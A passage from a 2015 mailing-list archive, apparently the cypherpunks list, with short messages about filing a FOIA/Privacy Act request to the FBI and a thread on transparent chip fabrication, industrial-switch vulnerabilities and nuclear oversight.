11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3043 bytes Desc: not available URL: From jdb10987 at yahoo.com Fri Jul 31 23:46:23 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sat, 1 Aug 2015 06:46:23 +0000 (UTC) Subject: FOIA/PA In-Reply-To: References: Message-ID: <242915876.53291.1438411583710.JavaMail.yahoo@mail.yahoo.com> Okay, what brought this on?  And which documents did you have in mind?            Jim Bell From: coderman To: jim bell Cc: "cypherpunks at cpunks.org" Sent: Friday, July 31, 2015 8:18 PM Subject: FOIA/PA hey Jim, you know what'd be fun? a FOIA/PA request to FBI for your documents. :) if you're so inclined, see https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/   for example wording of interest. best regards,   codermange -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1859 bytes Desc: not available URL: From carimachet at gmail.com Fri Jul 31 21:47:41 2015 From: carimachet at gmail.com (Cari Machet) Date: Sat, 1 Aug 2015 07:47:41 +0300 Subject: FOIA/PA In-Reply-To: References: Message-ID: ooooooooo jim i will help you do it On Aug 1, 2015 6:24 AM, "coderman" wrote: > hey Jim, > > you know what'd be fun? a FOIA/PA request to FBI for your documents. :) > > if you're so inclined, > see > https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/ > for example wording of interest. > > > best regards, > codermange > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 799 bytes Desc: not available URL: From carimachet at gmail.com Fri Jul 31 21:53:03 2015 From: carimachet at gmail.com (Cari Machet) Date: Sat, 1 Aug 2015 07:53:03 +0300 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> Message-ID: and what were we just talking http://www.dailydot.com/politics/industrial-ethernet-switches-ies-vulnerabilities/ On Sat, Aug 1, 2015 at 1:56 AM, Cari Machet wrote: > > > On Thu, Jul 30, 2015 at 1:06 AM, Steve Kinney wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> >> I do see problems with scaling DYI chip projects up to commercial >> production numbers, and down in scale to achieve fast, high >> capacity performance. That's why I am much more interested in the >> prospects of a manufacturing process built for radical >> transparency, using "commercial best practice" technology at >> conventional production facilities. >> >> IMO the same kind of radical transparency should apply to all >> industrial processes that pose large potential hazards to public >> health & safety, i.e. nuclear power stations, transgenic >> agriculture, etc. >> >> :o) >> >> > > > i have been thinking about this and i was thinking a lot about actual > nuclear bomb sites being added to the list > of 'hazard to public' and i was like - not possible to give the public any > kind of access to such horrors but then > its already in play ... NATOish people sold the design of the bomb to > pakistan and israel long ago so maybe > actually if more people were involved in the process it would be in safer > hands and there would be less > proliferation as it seems to be the modus operandi that there be more > bombs to counter > > best film ever points in the direction of nano/bio tech possibilities le > jette with the murder of species... can we have the components make > themselves and self destruct when in danger? > > > > -- > Cari Machet > NYC 646-436-7795 > carimachet at gmail.com > AIM carismachet > Syria +963-099 277 3243 > Amman +962 077 636 9407 > Berlin +49 152 11779219 > Reykjavik +354 894 8650 > Twitter: @carimachet > > 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 > > Ruh-roh, this is now necessary: This email is intended only for the > addressee(s) and may contain confidential information. If you are not the > intended recipient, you are hereby notified that any use of this > information, dissemination, distribution, or copying of this email without > permission is strictly prohibited. > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4791 bytes Desc: not available URL: